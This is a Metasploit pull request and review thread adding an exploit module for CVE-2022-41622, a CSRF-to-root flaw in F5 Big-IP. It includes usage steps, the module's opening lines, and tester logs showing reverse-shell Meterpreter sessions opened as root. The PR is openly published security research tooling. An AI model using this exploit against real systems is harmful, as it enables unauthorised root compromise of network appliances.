### PR TITLE
Check in exploit script for CVE-2022-41622 (CSRF into SOAP)

### PR DESCRIPTION
**Pull request by rbowes-r7**
Check in a module for CVE-2022-41622, which is a CSRF "write a file anywhere" vulnerability that can lead to persistent RCE as root.

Everything is tested against F5 Big-IP 17.0.0.1, which is freely available as a VM image (with a free account). It's also in our "vulnerable software" directory.

## Verification

This is a CSRF vuln, so it requires a browser in addition to msf:

1. Install the application
2. Start `msfconsole`
3. Do: `use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622`
4. Do `set TARGET_HOST <target>` / `set LHOST <yourtest>`
5. Do: `run`
6. You should get a url such as: `http://10.0.0.179:8080/ddgjZO`
7. Open a browser and visit that URL
8. If you don't already have an HTTP Basic session, it'll ask for your credentials (the `admin` account from earlier works great)

### CODE REVIEW

File: modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb [hunk 1]
```diff
@@ -0,0 +1,169 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::CmdStager
```
Comment (jmartin-r7) [inline modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb:10]:
```suggestion
```

This is not used.

**Review by jmartin-tech — COMMENTED** [review]
Looks good, just an extra mixin believe not to be needed.

**Comment by space-r7** [comment]
Worked great for me. No suggestions code-wise:

```
msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > run

[*] Started reverse TCP handler on 172.16.98.1:4444 
[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
[*] Using URL: http://172.16.98.1:8080/gWPZ74Cwj
[*] Server started.
[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
[*] Sending stage (24380 bytes) to 172.16.98.157
[+] Deleted /var/log/f5_update_checker.out
[*] Meterpreter session 1 opened (172.16.98.1:4444 -> 172.16.98.157:49364) at 2022-11-18 14:49:17 -0600


msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Sat Oct 23 12:41:52 PDT 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter >
```

**Comment by rbowes-r7** [comment]
There's a second TARGET option as well - to pop a shell at admin-login. It's non-default, because it overwrites a file that might be important :)

**Comment by space-r7** [comment]
Tested the last two targets. Logged in via ssh for target two and confirmed the custom file was written for target three:

```
msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set target 1
target => 1
msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > run

[*] Started reverse TCP handler on 172.16.98.1:4444 
[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
[*] Using URL: http://172.16.98.1:8080/skBsBgWk
[*] Server started.
[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
[*] Sending stage (24380 bytes) to 172.16.98.157
[+] Deleted /var/run/config/timeout.sh
[*] Meterpreter session 2 opened (172.16.98.1:4444 -> 172.16.98.157:42198) at 2022-11-18 15:49:16 -0600



```

**Comment by rbowes-r7** [comment]
Nice, glad it's working for you!

**Comment by space-r7** [comment]
Will go ahead and make the outstanding change and get this landed. Thanks!

**Comment by space-r7** [comment]
## Release Notes

This module exploits a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the `root` user.

**Pull request merged**